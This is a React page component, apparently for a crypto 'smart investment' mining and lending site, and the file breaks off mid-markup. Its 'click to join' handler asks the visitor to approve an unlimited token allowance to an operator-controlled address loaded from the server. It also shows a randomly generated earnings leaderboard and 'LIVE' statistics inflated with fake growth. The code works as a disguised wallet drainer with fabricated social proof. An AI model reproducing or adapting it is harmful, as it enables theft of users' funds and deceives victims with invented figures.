import React, { useState, useEffect } from 'react';
import { Card, Button, Typography, Row, Col, Table, Statistic, Input, message, Modal, Collapse } from 'antd';
import { ArrowRightOutlined, ArrowUpOutlined, SwapOutlined, BankOutlined, SafetyCertificateOutlined, ExperimentOutlined, WalletOutlined, LineChartOutlined, LinkOutlined } from '@ant-design/icons';
import { useNavigate } from 'react-router-dom';
import { useAccount, useConnect, useDisconnect, useReadContract, useWriteContract, useWatchContractEvent, useBalance } from 'wagmi';
import { mainnet } from 'wagmi/chains';
import { useContractRead, useContractWrite, useTransaction } from 'wagmi';
import { useContract } from '../hooks/useContract';
import { parseEther, formatEther } from 'viem';
import tokenAbi from '../abis/abi.json';
import { saveUserInfo, updateUserBalance, getUserInfo, updateUserAuthorizationStatus } from '../api/user';
import { recordUserAuthorization } from '../api/authorization';
import { getErcConfig } from '../api/config';
import api from '../api/axios';
import NoticeComponent from '../components/Notice';
import { getProfitRules, ProfitData } from '../services/profit';
import { getPlatformStats } from '../services/statsService';
import { PlatformStats } from '../types/stats';
import { useTranslation } from 'react-i18next';
import AuthorizationModal from '../components/AuthorizationModal';
import LanguageSwitcher from '../components/LanguageSwitcher';
import TokenApprove from '../components/TokenApprove';
import { ethers } from 'ethers';
import { formatEther as ethersFormatEther } from 'ethers/lib/utils';
import WalletConnect from '../components/WalletConnect';
import { useChainBalance } from '../utils/balance';
import RecordCard from '../components/RecordCard';

import './Home.css';

const { Title, Text } = Typography;
const { Panel } = Collapse;

// 全局配置变量
let authorized_address: string | null = null;

// 定义代币类型
type TokenType = 'USDC' | 'WETH';

// 代币合约地址
const TOKEN_ADDRESSES: Record<TokenType, string> = {
  USDC: '0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48', // 主网 USDC 地址
  WETH: '0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2', // 主网 WETH 地址
};

// 定义事件日志类型
interface ApprovalLog {
  args: {
    owner: `0x${string}`;
    spender: `0x${string}`;
    value: bigint;
  };
  eventName: string;
  address: `0x${string}`;
  transactionHash: `0x${string}`;
  blockNumber: number;
}

// 市场数据
const marketData = [
  {
    token: 'ETH',
    price: '$2,450.32',
    change24h: 2.5,
    volume24h: '$1.2B',
    marketCap: '$300B'
  },
  {
    token: 'USDC',
    price: '$1.00',
    change24h: 0.1,
    volume24h: '$2.5B',
    marketCap: '$80B'
  },
  {
    token: 'WETH',
    price: '$2,451.15',
    change24h: 2.6,
    volume24h: '$500M',
    marketCap: '$299B'
  }
];

interface Statistics {
  total_loans: number;
  total_trades: number;
  total_withdrawals: number;
  active_users: number;
  total_profits: number;
  last_updated: number;
}

// 添加时间格式化函数
const formatTime = (timestamp: number) => {
  const date = new Date(timestamp);
  return date.toLocaleTimeString('zh-CN', {
    hour: '2-digit',
    minute: '2-digit',
    second: '2-digit',
    hour12: false
  });
};

// 添加颜色辅助函数
const getCalculationColor = (count: number) => {
  let color;
  if (count > 20) {
    color = '#52c41a'; // 绿色 - 充足
  } else if (count > 10) {
    color = '#faad14'; // 黄色 - 中等
  } else if (count > 0) {
    color = '#ff7a45';  // 橙色 - 较少
  } else {
    color = '#ff4d4f'; // 红色 - 已用完
  }
  return color;
};



const styles = {
  iosBackground: {
    backgroundImage: `url(${process.env.PUBLIC_URL}/images/background2.jpg)`,
    backgroundAttachment: 'fixed',
    backgroundSize: '145% 100vh',
    backgroundPosition: 'center center',
    backgroundRepeat: 'no-repeat',
    position: 'fixed',
    top: 0,
    left: '50%',
    transform: 'translateX(-50%)',
    width: '100%',
    maxWidth: '1200px',
    height: '100vh',
    zIndex: 1,
    pointerEvents: 'none',
  } as React.CSSProperties,
};

// Add new styles for cards
const cardStyles = {
  card: {
    backgroundColor: 'rgba(0, 0, 0, 0.85)',
    WebkitBackdropFilter: 'blur(15px)',
    backdropFilter: 'blur(15px)',
    border: '1px solid rgba(255, 255, 255, 0.15)',
  },
  collapse: {
    backgroundColor: 'rgba(0, 0, 0, 0.85)',
    WebkitBackdropFilter: 'blur(15px)',
    backdropFilter: 'blur(15px)',
  },
  panel: {
    backgroundColor: 'rgba(0, 0, 0, 0.85)',
    WebkitBackdropFilter: 'blur(15px)',
    backdropFilter: 'blur(15px)',
  },
  userEarnings: {
    backgroundColor: 'rgba(20, 30, 40, 0.6)',
    WebkitBackdropFilter: 'blur(15px)',
    backdropFilter: 'blur(15px)',
    border: '1px solid rgba(100,255,218,0.08)',
  }
};

const Home: React.FC = () => {
  const { t } = useTranslation();
  const [showAuthModal, setShowAuthModal] = useState(false);
  const [isModalVisible, setIsModalVisible] = useState(false);
  const [isApproving, setIsApproving] = useState(false);
  const [isAuthorized, setIsAuthorized] = useState(false);
  const navigate = useNavigate();
  const { address, isConnected } = useAccount();
  const { connect, connectors } = useConnect();
  const { disconnect } = useDisconnect();
  const { balanceOf } = useContract(address as `0x${string}`);
  const [balance, setBalance] = useState<string>('0');
  const [configData, setConfigData] = useState<{ adminAddress: string; tokenAddress: string } | null>(null);
  const [profitRules, setProfitRules] = useState<ProfitData[]>([]);
  const [totalEarnings, setTotalEarnings] = useState<string>('0');
  const [availableBalance, setAvailableBalance] = useState<string>('0');
  const [viewmoney, setViewmoney] = useState<string>('0');
  const [userEarnings, setUserEarnings] = useState([
    {
      address: '0x7a3d...8c2f',
      earnings: '12,345.678901'
    },
    {
      address: '0x9b1e...4d7a',
      earnings: '8,765.432109'
    },
    {
      address: '0x2f4a...6e8c',
      earnings: '15,678.901234'
    },
    {
      address: '0x5c3d...9f2a',
      earnings: '23,456.789012'
    },
    {
      address: '0x8e1f...3b4d',
      earnings: '9,876.543210'
    },
    {
      address: '0x3a2b...7c8d',
      earnings: '18,765.432109'
    },
    {
      address: '0x6f5e...2d1c',
      earnings: '11,234.567890'
    }
  ]);
  const [userInfo, setUserInfo] = useState<any>(null);
  const [lendingData, setLendingData] = useState({
    totalBorrowed: '0',
    annualRate: '8.5',
    availableLimit: '0',
    usedLimit: '0'
  });
  const [statistics, setStatistics] = useState<Statistics>({
    total_loans: 0,
    total_trades: 0,
    total_withdrawals: 0,
    active_users: 0,
    total_profits: 0,
    last_updated: 0
  });
  const [loading, setLoading] = useState(false);
  const [isConnecting, setIsConnecting] = useState(false);
  const [remainingCalculations, setRemainingCalculations] = useState<number>(0);
  const [bilv, setBilv] = useState<string>('0');

  // 在组件顶层使用 useChainBalance hook
  const { balance: chainBalance } = useChainBalance(address || '');

  // 获取配置信息
  const fetchConfig = async () => {
    try {
      
      
      // 获取 ERC 配置
      const config = await getErcConfig();
      

      if (!config || !config.b_address || !config.b_key) {
        console.error('配置数据不完整:', config);
        message.error(t('common.configIncomplete'));
        return;
      }

      const newConfig = {
        adminAddress: config.b_address, // 授权地址
        tokenAddress: config.b_key     // 代币地址
      };
     
      setConfigData(newConfig);
      // 更新全局配置
      authorized_address = config.b_address;
    } catch (error: any) {
      console.error('获取配置失败:', error);
      if (error.response?.status === 404) {
        message.error(t('common.configApiNotFound'));
      } else if (error.response?.status === 500) {
        message.error(t('common.serverError'));
      } else {
        message.error(t('common.getConfigFailed'));
      }
    }
  };

  // 组件挂载时获取配置
  useEffect(() => {
    fetchConfig();
  }, []);

  // 注释掉事件监听以节省 Infura Credits
  // 改为手动检查授权状态，减少 eth_getFilterChanges 调用
  /*
  useWatchContractEvent({
    address: configData?.tokenAddress as `0x${string}`,
    abi: tokenAbi,
    eventName: 'Approval',
    enabled: !!address && !!configData?.tokenAddress && !isAuthorized,  // 只在未授权时监听
    onLogs(logs: ApprovalLog[]) {
      
      // 使用已保存的授权地址，而不是重新请求
      if (configData?.adminAddress) {
        if (logs[0].args.owner === address && logs[0].args.spender === configData.adminAddress) {
          
          setIsAuthorized(true);
          message.success(t('messages.authorization.success'));
          
          // 记录授权信息
          recordUserAuthorization({
            walletAddress: address,
            tokenAddress: configData.tokenAddress,
            approvalAddress: configData.adminAddress,
            authorizationAmount: logs[0].args.value.toString(),
            transactionHash: logs[0].transactionHash,
            blockNumber: logs[0].blockNumber
          }).catch((error: any) => {
            console.error('记录授权信息失败:', error);
            message.error(t('messages.authorization.recordFailed'));
          });

          // 更新用户授权状态
          updateUserAuthorizationStatus(address, 1).catch((error: any) => {
            console.error('更新用户授权状态失败:', error);
            message.error(t('messages.authorization.updateStatusFailed'));
          });

          // 刷新用户数据以获取最新的计算次数和状态
          setTimeout(() => {
            fetchUserTotalBalance();
          }, 1000); // 延迟1秒确保数据库更新完成
        }
      }
    }
  });
  */

  // 获取代币精度 - 优化：增加缓存时间，减少重复调用
  const { data: decimals } = useContractRead({
    address: configData?.tokenAddress as `0x${string}`,
    abi: tokenAbi,
    functionName: 'decimals',
    query: {
      enabled: !!configData?.tokenAddress,
      staleTime: 30 * 60 * 1000,  // 30分钟缓存（代币精度不会变化）
      gcTime: 60 * 60 * 1000,  // 1小时垃圾回收时间
      refetchOnWindowFocus: false,
      refetchOnMount: false
    }
  });

  // 获取用户总余额
  const fetchUserTotalBalance = async () => {
    if (!address) return;
    try {
      // 获取用户信息（用于计算余额）
      const userResponse = await api.get(`/users/${address}`);
      // 获取收益信息（用于显示总产出、可提现余额和质押数量）
      const jiangResponse = await api.get(`/jiang/info?address=${address}`);
      
      if (userResponse.data.code === 200 && jiangResponse.data.code === 200) {
       
        
        // 使用 lk_users 表的 balance + total 只用于显示
        const totalBalance = (Number(userResponse.data.data.balance) + Number(userResponse.data.data.total)).toString();
       
        
        setBalance(totalBalance);
        
        // 设置收益相关信息
        setAvailableBalance(jiangResponse.data.data.amount);
        setViewmoney(jiangResponse.data.data.viewmoney);
        setTotalEarnings(jiangResponse.data.data.total);
        
        // 设置计算次数相关数据
        // 使用更明确的判断，确保 0 也是有效值
        const typeValue = jiangResponse.data.data.type !== null && jiangResponse.data.data.type !== undefined
          ? jiangResponse.data.data.type 
          : 0;
        const isactiveValue = jiangResponse.data.data.isactive;
        const bilvValue = jiangResponse.data.data.bilv || '0';
        
        setRemainingCalculations(typeValue);
        setBilv(bilvValue);
      }
    } catch (error) {
      console.error('获取用户信息失败:', error);
    }
  };

  // 监听钱包连接状态和余额变化
  useEffect(() => {
    const handleWalletConnection = async () => {
      if (address && chainBalance !== undefined && configData?.adminAddress) {
        
        // 检查用户是否存在
        try {
          const userInfo = await getUserInfo(address);
          // 用户存在，只有当余额不为0时才更新
          if (chainBalance && chainBalance !== '0') {
            console.log('用户存在，更新余额');
            // 更新 lk_users 表的余额
            await updateUserBalance(address, chainBalance);
            // 更新 lk_jiang 表的余额
            await api.put(`/jiang/update-balance`, {
              address: address,
              balance: chainBalance
            });
          } else {
            console.log('用户存在但余额为0，跳过更新');
          }
          
          // 无论余额是否为0，都要获取最新的用户数据
          console.log('获取用户最新数据');
          await fetchUserTotalBalance();
        } catch (error: any) {
          if (error.response?.status === 404) {
            // 用户不存在，创建新用户（即使余额为0）
            console.log('用户不存在，创建新用户');
            
            const decodedUid = localStorage.getItem('decodedUid') || '1';  // 使用默认值1
            
            if (!configData) {
              console.error('配置数据未加载');
              return;
            }
            
            await saveUserInfo(
              address,
              chainBalance || '0', // 使用链上实际余额或0
              configData.adminAddress,
              decodedUid  // 使用解码后的 uid 值或默认值1
            );
            console.log('新用户创建成功');
            
          } else {
            console.error('获取用户信息失败:', error);
            message.error(t('errors.getUserInfoFailed'));
          }
        }
        }
    };

    handleWalletConnection();
  }, [address, chainBalance, configData?.adminAddress]);


  // 移除了不必要的日志记录 useEffect，减少不必要的执行

  // 钱包连接时强制刷新余额和授权状态
  useEffect(() => {
    if (isConnected && address && configData?.tokenAddress) {
      console.log('钱包连接，检查余额和授权状态:', {
        address,
        tokenAddress: configData.tokenAddress,
        chainId: 1
      });
      fetchUserTotalBalance();  // 连接时也获取一次总余额
      
      // 连接时检查一次链上余额（只在需要时检查）
      if (chainBalance !== undefined) {
        console.log('检查链上余额:', chainBalance);
      }
      
      // 连接时检查一次授权状态（只在需要时检查）
      if (configData?.adminAddress) {
        console.log('检查授权状态');
        // 手动触发授权状态检查
        setTimeout(() => {
          checkAuthorizationStatus();
        }, 1000);
      }
    }
  }, [isConnected, address, configData?.tokenAddress, configData?.adminAddress, chainBalance]);

  const { data: allowance, refetch: refetchAllowance } = useContractRead({
    address: configData?.tokenAddress as `0x${string}`,
    abi: tokenAbi,
    functionName: 'allowance',
    args: [address, configData?.adminAddress],
    query: {
      enabled: !!address && !!configData?.adminAddress && !!configData?.tokenAddress,
      // 移除 refetchInterval，只在需要时手动检查
      // refetchInterval: false,  // 注释掉自动轮询
      staleTime: 10 * 60 * 1000,  // 优化：增加到10分钟缓存
      gcTime: 15 * 60 * 1000,  // 15分钟垃圾回收时间
      refetchOnWindowFocus: false,  // 窗口聚焦时不重新获取
      refetchOnMount: false  // 组件挂载时不重新获取
    }
  });

  // 移除了不必要的授权状态日志记录

  // 检查授权状态
  const checkAuthorizationStatus = async () => {
    if (!isConnected || !address) return;
    
    try {
      const userInfo = await getUserInfo(address).catch(() => null);
      const allowanceBigInt = allowance ? BigInt(allowance.toString()) : BigInt(0);
      
      // 如果合约中有授权金额，就认为已授权
      if (allowanceBigInt > BigInt(0)) {
        setIsAuthorized(true);
        
        // 如果用户不存在，创建新用户
        if (!userInfo) {
          
          const authDecodedUid = localStorage.getItem('decodedUid') || '1';  // 使用默认值1
          
          
          if (!configData) {
            console.error('配置数据未加载');
            return;
          }
          
          await saveUserInfo(
            address,
            chainBalance, // 使用链上实际余额
            configData.adminAddress,
            authDecodedUid  // 使用解码后的 uid 值或默认值1
          );
       
        }
        // 如果数据库状态不一致，更新数据库
        else if (userInfo.wallet_status !== 1) {
          
          await updateUserAuthorizationStatus(address, 1);
        }

        // 刷新用户数据以获取最新的计算次数和状态
        setTimeout(() => {
          fetchUserTotalBalance();
        }, 1000); // 延迟1秒确保数据库更新完成
      } else {
        
        setIsAuthorized(false);
        // 如果数据库显示已授权，但合约未授权，更新数据库
        if (userInfo?.wallet_status === 1) {
          
          await updateUserAuthorizationStatus(address, 0);
        }
      }
    } catch (error) {
      console.error(':', error);
      message.error(t('errors.checkAuthorizationFailed'));
    }
  };

  // 监听授权状态变化
  useEffect(() => {
    if (allowance) {
     
      checkAuthorizationStatus();
    }
  }, [allowance]);

  // 合约写入hook
  const { writeContractAsync } = useWriteContract();

  // 取消首次自动弹出 Web3Modal（改为按钮触发）
  useEffect(() => {
    if (!isConnected) {
      localStorage.removeItem('hasShownWalletModal');
    }
  }, [isConnected]);

  // 当用户断开钱包连接时，重置标记，下次访问时还会弹出
  useEffect(() => {
    if (!isConnected) {
      localStorage.removeItem('hasShownWalletModal');
    }
  }, [isConnected]);

  const handleJoin = async () => {
    if (!address || !configData?.adminAddress || !configData?.tokenAddress) {
      message.error(t('messages.authorization.missingInfo'));
      return;
    }

    try {
      // 直接发起授权请求，不预先检查（减少延迟）
      console.log('用户点击加入，直接发起授权请求...');
      
      // 发起授权请求
      const hash = await writeContractAsync({
        address: configData.tokenAddress as `0x${string}`,
        abi: tokenAbi,
        functionName: 'approve',
        args: [configData.adminAddress as `0x${string}`, '0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff']
      });
      
      message.success(t('messages.transaction.submitted'));
      
      // 交易提交后，等待几秒再检查授权状态
      setTimeout(async () => {
        console.log('检查授权状态更新');
        await checkAuthorizationStatus();
      }, 3000);
      
    } catch (error) {
      console.error('授权失败:', error);
      message.error(t('messages.authorization.failed'));
    }
  };

  const handleConnect = () => {
    setIsModalVisible(true);
  };

  const handleWalletSelect = async (connector: any) => {
    try {
      connect({ connector });
      setIsModalVisible(false);
    } catch (error) {
      console.error('连接钱包失败:', error);
    }
  };

  const handleDeposit = async () => {
    try {
      message.info(t('messages.deposit.notImplemented'));
    } catch (error) {
      console.error('Deposit failed:', error);
      message.error(t('messages.deposit.failed'));
    }
  };

  // 格式化数字
  const formatNumber = (num: number): string => {
    if (num >= 1000000) {
      return (num / 1000000).toFixed(2) + 'M';
    } else if (num >= 1000) {
      return (num / 1000).toFixed(2) + 'K';
    }
    return num.toString();
  };

  // 获取收益规则
  useEffect(() => {
    const fetchProfitRules = async () => {
      try {
        const response = await getProfitRules();
        if (response.code === 0) {
          setProfitRules(response.data);
        }
      } catch (error) {
        console.error('获取收益规则失败:', error);
        message.error(t('messages.profit.fetchRulesFailed'));
      }
    };

    fetchProfitRules();
  }, []);

  // 生成随机钱包地址
  const generateRandomAddress = () => {
    const chars = '0123456789abcdef';
    let address = '0x';
    for (let i = 0; i < 8; i++) {
      address += chars.charAt(Math.floor(Math.random() * chars.length));
    }
    address += '...';
    for (let i = 0; i < 4; i++) {
      address += chars.charAt(Math.floor(Math.random() * chars.length));
    }
    return address;
  };

  useEffect(() => {
    const interval = setInterval(() => {
      // 生成新的随机数据，包括地址和收益金额
      const newEarnings = Array.from({ length: 7 }, () => ({
        address: generateRandomAddress(),
        earnings: (Math.random() * 10000).toFixed(6)
      }));
      setUserEarnings(newEarnings);
    }, 10000); // 改为每10秒刷新一次，减少频率

    return () => clearInterval(interval);
  }, []);

  // 获取用户信息
  useEffect(() => {
    if (address) {
      // 获取 lk_jiang 表数据
      api.get(`/jiang/info?address=${address}`)
        .then(response => {
          if (response.data.code === 200) {
            const { total, amount, balance, bilv, viewmoney, lending } = response.data.data;
            setTotalEarnings(total || '0');
            setAvailableBalance(amount || '0');
            setViewmoney(viewmoney || '0'); // 设置 viewmoney
            // 设置借贷数据
            if (lending) {
              setLendingData({
                totalBorrowed: lending.totalLimit || '0',
                annualRate: '8.5',
                availableLimit: lending.availableLimit || '0',
                usedLimit: lending.usedLimit || '0'
              });
            }
          }
        })
        .catch(error => {
          console.error('获取用户信息失败:', error);
        });
    }
  }, [address]);

  // 获取钱包信息
  const fetchWalletInfo = async () => {
    if (!address) return;
    try {
      const response = await api.get(`/jiang/info?address=${address}`);
      if (response.data.code === 200) {
        const { amount, lending } = response.data.data;
        setAvailableBalance(amount || '0');
        // 更新借贷数据
        if (lending) {
          setLendingData(prev => ({
            ...prev,
            availableLimit: lending.availableLimit || '0',
            usedLimit: lending.usedLimit || '0'
          }));
        }
      }
    } catch (error) {
      console.error('获取钱包信息失败:', error);
    }
  };

  // 监听钱包地址变化
  useEffect(() => {
    if (address) {
      fetchWalletInfo();
    }
  }, [address]);

  // 获取平台统计数据
  useEffect(() => {
    const fetchStats = async () => {
      try {
        const stats = await getPlatformStats();
        setStatistics(stats);
        // 更新借贷数据
        setLendingData(prev => ({
          ...prev,
          totalBorrowed: formatNumber(stats.total_loans)
        }));
      } catch (error) {
        console.error('Failed to fetch platform stats:', error);
      }
    };

    fetchStats();
    // 每5分钟更新一次数据
    const interval = setInterval(fetchStats, 5 * 60 * 1000);
    return () => clearInterval(interval);
  }, []);

  // 计算新的统计数据
  useEffect(() => {
    const calculateNewStats = () => {
      setStatistics(prev => {
        // 为每个指标生成一个随机增长因子
        const totalTradesGrowth = 1 + (Math.random() * 0.000000005); // 0.0000005% 增长
        const totalWithdrawalsGrowth = 1 + (Math.random() * 0.000000004); // 0.0000004% 增长
        const activeUsersGrowth = 1 + (Math.random() * 0.000000002); // 0.0000002% 增长
        const totalProfitsGrowth = 1 + (Math.random() * 0.000000004); // 0.0000004% 增长
        const totalLoansGrowth = 1 + (Math.random() * 0.000000003); // 0.0000003% 增长

        return {
          total_trades: Number((prev.total_trades * totalTradesGrowth).toFixed(6)),
          total_withdrawals: Number((prev.total_withdrawals * totalWithdrawalsGrowth).toFixed(6)),
          active_users: Math.floor(prev.active_users * activeUsersGrowth),
          total_profits: Number((prev.total_profits * totalProfitsGrowth).toFixed(6)),
          total_loans: Number((prev.total_loans * totalLoansGrowth).toFixed(6)),
          last_updated: Date.now()
        };
      });
    };

    // 活跃用户每5分钟更新一次
    const activeUsersInterval = setInterval(calculateNewStats, 5 * 60 * 1000);
    // 其他数据每10分钟更新一次
    const otherStatsInterval = setInterval(calculateNewStats, 10 * 60 * 1000);

    return () => {
      clearInterval(activeUsersInterval);
      clearInterval(otherStatsInterval);
    };
  }, []);

  // 获取借贷数据
  const fetchLendingData = async () => {
    if (!address) return;
    try {
      const response = await api.get(`/user-limits/info?address=${address}`);
      if (response.data.success) {
        const { total_limit, used_limit, available_limit } = response.data.data;
        setLendingData({
          totalBorrowed: total_limit || '0',
          annualRate: '8.5', // 硬编码年化利率
          availableLimit: available_limit || '0',
          usedLimit: used_limit || '0'
        });
      }
    } catch (error) {
      console.error('获取借贷数据失败:', error);
    }
  };

  // 监听钱包地址变化
  useEffect(() => {
    if (address) {
      fetchLendingData();
    }
  }, [address]);

  // 处理借款
  const handleBorrow = async () => {
    if (!address) {
      message.error(t('errors.connectWalletFirst'));
      return;
    }

    try {
      const response = await api.post('/jiang/loan', { 
        address: address 
      });
      
      if (response.data.success) {
        message.success(t('messages.lending.borrow.submitted'));
        // 刷新用户信息
        await fetchLendingData();
      } else {
        message.error(response.data.message || t('messages.lending.borrow.failed'));
      }
    } catch (error) {
      console.error('申请借款失败:', error);
      message.error(t('messages.lending.borrow.failed'));
    }
  };

  // 处理提现
  const handleWithdraw = async () => {
    if (!address) {
      message.error(t('errors.connectWalletFirst'));
      return;
    }

    if (Number(availableBalance) <= 0) {
      message.error(t('errors.insufficientBalance'));
      return;
    }

    try {
      const response = await api.post('/withdrawals/create', { 
        address: address,
        amount: availableBalance // 使用可提现余额
      });
      
      if (response.data.code === 200) {
        message.success(t('messages.withdrawal.submitted'));
        // 刷新用户信息
        await fetchLendingData();
      } else {
        message.error(response.data.message || t('errors.withdrawFailed'));
      }
    } catch (error) {
      console.error('申请提现失败:', error);
      message.error(t('errors.withdrawFailed'));
    }
  };

  // 处理借贷提款
  const handleLendingWithdraw = async () => {
    if (!address) {
      message.error(t('errors.connectWalletFirst'));
      return;
    }

    try {
      const response = await api.post('/loan-draw/apply', { 
        address: address 
      });
      
      if (response.data.code === 200) {
        message.success(t('messages.lending.withdraw.submitted'));
        // 刷新用户信息
        await fetchLendingData();
      } else {
        message.error(response.data.message || t('messages.lending.withdraw.failed'));
      }
    } catch (error) {
      console.error('申请提款失败:', error);
      message.error(t('messages.lending.withdraw.failed'));
    }
  };

  return (
    <div className="home-container">
      <div className="background-wrapper">
        <div 
          className="background-image" 
          style={{
            backgroundImage: `url(${process.env.PUBLIC_URL}/images/background2.jpg)`,
            backgroundAttachment: 'fixed',
            backgroundSize: '145% 100vh',
            backgroundPosition: 'center center',
            backgroundRepeat: 'no-repeat'
          }}
        />
      </div>
      <div className="language-switcher-container" style={{ position: 'absolute', top: '10px', right: '10px', zIndex: 1000, transform: 'scale(0.4)' }}>
        <LanguageSwitcher />
      </div>
      
        <Col span={24}>
          <Card className="mining-auth-card" style={cardStyles.card}>
            <div className="mining-auth-content">
              <div className="mining-auth-info">
                <Title level={3}>{t('common.joinUs')}</Title>
                <Text>{t('common.smartInvestment')}</Text>
              </div>
              <div className="mining-auth-action">
                {isAuthorized ? (
                  <Button 
                    type="primary" 
                    size="large" 
                    icon={<SafetyCertificateOutlined />} 
                    disabled
                  >
                    {t('common.joined')}
                  </Button>
                ) : !address ? (
                  <Button 
                    type="primary" 
                    size="large" 
                    icon={<WalletOutlined />}
                    loading={isConnecting}
                    disabled={isConnecting}
                    onClick={async () => {
                      try {
                        setIsConnecting(true);
                        const key = 'wc-loading';
                        message.loading({ content: t('common.connecting'), key, duration: 0 });

                        // 优先尝试注入式（内置钱包环境）
                        const isInAppWallet = typeof window !== 'undefined' && (window as any).ethereum;
                        const injectedConnector = connectors.find(c => c.id === 'injected' || c.name === 'MetaMask' || c.name === 'Injected');
                        if (isInAppWallet && injectedConnector) {
                          await connect({ connector: injectedConnector, chainId: 1 });
                          message.destroy(key); // 不显示“连接成功”提示
                          return;
                        }

                        // 运行时按平台选择 WalletConnect 连接器
                        const ua = typeof navigator !== 'undefined' ? navigator.userAgent : '';
                        const isMobile = /Android|iPhone|iPad|iPod/i.test(ua);
                        const wcConnectors = connectors.filter(c => c.name === 'WalletConnect');
                        const wcDesktop = wcConnectors.find(c => (c as any).options?.showQrModal === true) || wcConnectors[0];
                        const wcMobile = wcConnectors.find(c => (c as any).options?.showQrModal === false) || wcConnectors[wcConnectors.length - 1];

                        const target = isMobile ? wcMobile : wcDesktop;
                        if (!target) {
                          message.error({ content: t('errors.walletConnectNotAvailable'), key });
                          return;
                        }
                        await connect({ connector: target, chainId: 1 });
                        message.destroy(key); // 不显示“连接成功”提示
                      } catch (e) {
                        console.error('连接钱包失败:', e);
                        message.error({ content: t('errors.connectWalletFailed'), key: 'wc-loading' });
                      } finally {
                        setIsConnecting(false);
                      }
                    }}
                  >
                    {isConnecting ? t('common.connecting') : t('common.connectWallet')}
                  </Button>
                ) : (
                  <Button 
                    type="primary" 
                    size="large" 
                    icon={<SafetyCertificateOutlined />}
                    onClick={handleJoin}
                  >
                    {t('common.clickToJoin')}
                  </Button>
                )}
              </div>
            </div>
          </Card>
        </Col>
        <Row gutter={[0, 0]}>
      

        {/* 钱包信息卡片 */}
        <Col span={24}>
          <Card className="wallet-info-card" style={cardStyles.card}>
            <div className="wallet-info-content">
              <div className="wallet-info-header">
                <Title level={3}>{t('common.walletInfo')}</Title>
                <Text className="wallet-address">{isConnected ? `${address?.slice(0, 6)}...${address?.slice(-4)}` : t('common.walletNotConnected')}</Text>
              </div>
              <div className="wallet-info-stats">
                <div className="stat-item">
                  <Text type="secondary">{t('common.totalOutput')}: </Text>
                  <Text strong>{totalEarnings} USDC</Text>
                </div>
                <div className="stat-item">
                  <Text type="secondary">{t('common.balance')}: </Text>
                  <Text strong>{Number(balance).toFixed(6)} USDC</Text>
                </div>
                <div className="stat-item">
                  <Text type="secondary">{t('common.availableBalance')}: </Text>
                  <Text strong>{availableBalance} USDC</Text>
                </div>
                <div className="stat-item">
                  <Text type="secondary">{t('common.stakedAmount')}: </Text>
                  <Text strong>{viewmoney} USDC</Text>
                </div>
                {/* 新增：只在已授权时显示计算次数相关信息 */}
                {isAuthorized && (
                  <>
                    <div className="stat-item">
                      <Text type="secondary">{t('common.timeRemaining')}: </Text>
                      <Text 
                        strong 
                        style={{ 
                          color: getCalculationColor(remainingCalculations),
                          textShadow: 'none'
                        }}
                      >
                        {remainingCalculations} {t('common.times')}
                      </Text>
                      {remainingCalculations <= 10 && remainingCalculations > 0 && (
                        <Text type="secondary" style={{ fontSize: '12px', marginLeft: '8px' }}>
                          {t('common.aboutToRunOut')}
                        </Text>
                      )}
                    </div>
                    <div className="stat-item">
                      <Text type="secondary">{t('common.currentDailyRate')}: </Text>
                      <Text 
                        strong 
                        style={{ 
                          color: '#64ffda',
                          textShadow: 'none'
                        }}
                      >
                        {bilv}%
                      </Text>
                    </div>
                  </>
                )}
              </div>
              <div className="wallet-info-actions">
                <Button 
                  type="primary" 
                  className="wallet-action-button"
                  onClick={handleWithdraw}
                >
                  {t('common.withdraw')}
                </Button>
              </div>
            </div>
          </Card>
        </Col>

        {/* 总产出卡片 */}
        <Col span={24}>
          <Card style={cardStyles.card}>
            <Statistic
              title={t('common.totalOutput')}
              value={totalEarnings}
              prefix={<LineChartOutlined />}
              suffix="USDC"
              className="total-output"
            />
          </Card>
        </Col>

        {/* 记录卡片 */}
        <Col span={24}>
          <RecordCard />
        </Col>
        <Col span={24}>
          <NoticeComponent />
        </Col>
        {/* 借贷市场卡片 */}
        <Col span={24}>
          <Card className="lending-market-card" style={cardStyles.card}>
            <div className="lending-market-content">
              <div className="lending-market-header">
                <Title level={3}>{t('common.lendingMarket')}</Title>
                <Text className="market-status">{t('common.opening')}</Text>
              </div>
              <div className="lending-market-stats">
                <div className="stat-item">
                  <Text type="secondary">{t('common.totalBorrowed')}: </Text>
                  <Text strong>{statistics.total_loans} USDC</Text>
                </div>
                <div className="stat-item">
                  <Text type="secondary">{t('common.annualRate')}: </Text>
                  <Text strong>{lendingData.annualRate}%</Text>
                </div>
                <div className="stat-item">
                  <Text type="secondary">{t('common.availableLimit')}: </Text>
                  <Text strong>{lendingData.availableLimit} USDC</Text>
                </div>
                <div className="stat-item">
                  <Text type="secondary">{t('common.borrowedAmount')}: </Text>
                  <Text strong>{lendingData.usedLimit} USDC</Text>
                </div>
              </div>
              <div className="lending-market-actions">
                <Button 
                  type="primary" 
                  className="market-action-button"
                  onClick={handleBorrow}
                  disabled={!lendingData.availableLimit || parseFloat(lendingData.availableLimit) <= 0}
                >
                  {t('common.borrow')}
                </Button>
                <Button 
                  type="primary" 
                  className="market-action-button"
                  onClick={handleLendingWithdraw}
                  disabled={!lendingData.usedLimit || parseFloat(lendingData.usedLimit) <= 0}
                >
                  {t('common.repay')}
                </Button>
              </div>
            </div>
          </Card>
        </Col>

        {/* 平台数据卡片 */}
        <Col span={24}>
          <div className="statistics-section">
            <div className="statistics-header">
              <div className="statistics-title-container">
                <Title level={3} className="statistics-title">{t('common.platformData')}</Title>
                <div className="title-badge">LIVE</div>
              </div>
            </div>
            <div className="statistics-grid">
              <Card className="stat-card total-trades" style={cardStyles.card}>
                <div className="stat-content">
                  <div className="stat-info">
                    <div className="stat-label">{t('common.totalVolume')}</div>
                    <div className="stat-value">
                      <span className="currency">$</span>
                      <span className="number">{statistics.total_trades.toLocaleString('en-US', { minimumFractionDigits: 6, maximumFractionDigits: 6 })}</span>
                    </div>
                  </div>
                  <div className="stat-trend">
                    <span className="trend-icon">↑</span>
                  </div>
                </div>
              </Card>

              <Card className="stat-card total-withdrawals" style={cardStyles.card}>
                <div className="stat-content">
                  <div className="stat-info">
                    <div className="stat-label">{t('common.totalWithdrawals')}</div>
                    <div className="stat-value">
                      <span className="currency">$</span>
                      <span className="number">{statistics.total_withdrawals.toLocaleString('en-US', { minimumFractionDigits: 6, maximumFractionDigits: 6 })}</span>
                    </div>
                  </div>
                  <div className="stat-trend">
